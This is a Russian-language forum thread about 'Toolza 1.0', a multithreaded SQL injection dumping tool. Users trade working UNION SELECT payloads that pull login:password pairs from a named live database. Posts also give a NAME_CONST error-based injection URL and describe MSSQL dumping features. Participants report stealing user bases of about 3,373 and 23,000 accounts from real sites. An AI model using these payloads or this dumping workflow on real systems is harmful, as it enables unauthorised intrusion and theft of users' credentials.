Toolza 1.0

А как быть если перебор идёт через limit вот например limit+35,15 (а не так limit+35,1)

 

limit x,y первый параметр с какой записи, а второй сколько.
А у тебя что получается limit 35,15?

 

нет эт я пример просто написал! а нескажешь почему например юзеров 10000 тулза ничинает выводить но не все а намного меньше ну штук 100-150 но бывает даже меньше(( может вот из-за этого лимита просто я пробывал в ручную переберать и лимит шол вот как(Limit+1,1 limit+2,1 limit+3,2 limit+4,3) ну и так далее

 

ссылку в студию, пока на бред похоже

иногда не все, что посчитано, доступно к чтению. Или неправильно считает

 

включи icq

 

как ты узнал, количесво выводимых данных? через count(*)

 

axe89 дал ссылку в личку, все прекрасно парсится и через пост даже, в чем трабл - непонятно

 

ты попробуй чтоб она всех юзеров вывела.я пробывал у меня из всех юзеров только штук 100 выводило

 

Ну, проверил, пишет 12 с чем то тысяч юзеров, выводит около 170 - значит реально 170 и есть. Можешь проверить запросом:

+union+select+1,2,3,4,5,count(*),7,8,9,10,11+from+mobile_funsat1.polyfun_users

покажет 12651

но это не значит, что это так и есть. База может быть порушена, юзеры могут быть некорректно удалены и т.д.

Реально дампит то, что дампится. То, что считается, далеко не всегда соотвествует действительности

PS: 10 потоков

Прежде, чем кидать предъявы, проверь:

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass),7,8,9,10,11+from+mobile_funsat1.polyfun_users+limit+200,1

если выведет логин и пароль - то я съем свою мышку

 

я если чесно когда про тулзу незнал я в ручную переберал дошол до 2к

 

ок, еще раз:

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+from+mobile_funsat1.polyfun_users+lim it+200,1

ты хочешь сказать, что при данном запросе что-то выводит?

PS: Нестандартные запросы, типо

limit 20,20 - не поддерживаются

 

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+ from+polyfun_users+limit+2000,15

 

udate:

MySql inj NAME_CONST:

- Многопоточный
- POST/GET/Coockies & etc.
- Все те же возможности, что и при обычной скуле + та же скорость
- просто заменить два раза "version()" на "^" (shift+6), т.е. было:

Code:

http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1/*

стало:

Code:

http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((^),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((^),14)e)b)a)/**/and/**/'1'='1/*

Отдельный риспект хотелось бы выразить Qwazar и jokester за эту тему.

В видео рассмотрен полный процесс от получения версия до дампа 3 373 юзеров (логины/пароли) с риал сайта.

Видео: - режим MySql inj NAME_CONST

Обновления как всегда в первом посте темы, скрипт в UTF-8

 

значит что то с базой не то, не может быть так урезал остальных. Я уже проверил и слил базу на 23к с чем то юзеров прекрасно слил. Еще ставь на 10 потоков а то база может испортится(на 10 тоже быстро сливает).

Pashkela что то при MySQL injection column number bruter номера полей много раз выводит 11 а так там 25. Пробовал изменят на GET, добавил/ удалил c id=-1 "-" но все таки выводит полей 11. ССылку не в студию (большая база), но ты протестирую может глюк какой то. Еще если можно добав функцию чтоб юзер сам выбрал:
[1]Union Select
[2]Order By
[3]Group By
а то авто выбор может глючит.

 

В режиме MySQL injection column number bruter решающее значение имеет уникальная мессага при правильном/неправильном запросе именно кол-ва столбцов. Проверял на 105 колонках - все работает.

PS: Нет никогда абсолютной гарантии, что тулза сработает на любой инъекции, это тоже учитывайте. На большинстве, но не на абсолютно всех, как и любая другая прога такого типа. Всегда есть какие-то особенности, всё не предусмотришь

Играйте с потоками - уменьшайте вплоть до одного при некорректных ответах. Большое значение имеет качество коннекта с сайтом и ширина вашего интернет канала в том числе.

 

прога класс, но кто нит знает многопоточную дампер на MSSQL(silviasql и DarkMSSQL не в счет, они на больших базах тормозит)? Toolza прекрасно работает с большыми базами, но жал только на MySQL ((

очень надо если кто знает на MSSQL

 

2-ой пост темы:

/showpost.php?p=236188&postcount=3

А вообще сейчас пишу

 

udate:

MSSQL injection:

- POST/GET/Cookie & etc.
- Определение кол-ва колонок и принтабельной колонки не требуется
- авто-CHAR всех данных
- Полный цикл - от системных переменных до данных из колонок:
1) Получаем системные переменные (@@version,system_user,db_name())
2) Таблицы из information_schema.tables (1 thread, специфика MSSQL inj)
3) Колонки из таблицы (1 thread, специфика MSSQL inj)
4) Данные из таблицы на основе выбранных колонок (Multithread, max 10) - обязательно наличие autoincriment поля (id & etc).

Видео: режим MSSQL injection

PS: Пока сыровато конечно, но из 10 скулей 8 обработало. Пока только исключительно для классических случаев. Need more tests

 

главное 10потоков на Dump вставил, молодец будем тестит.

 

в общем перекачайте, исправления появились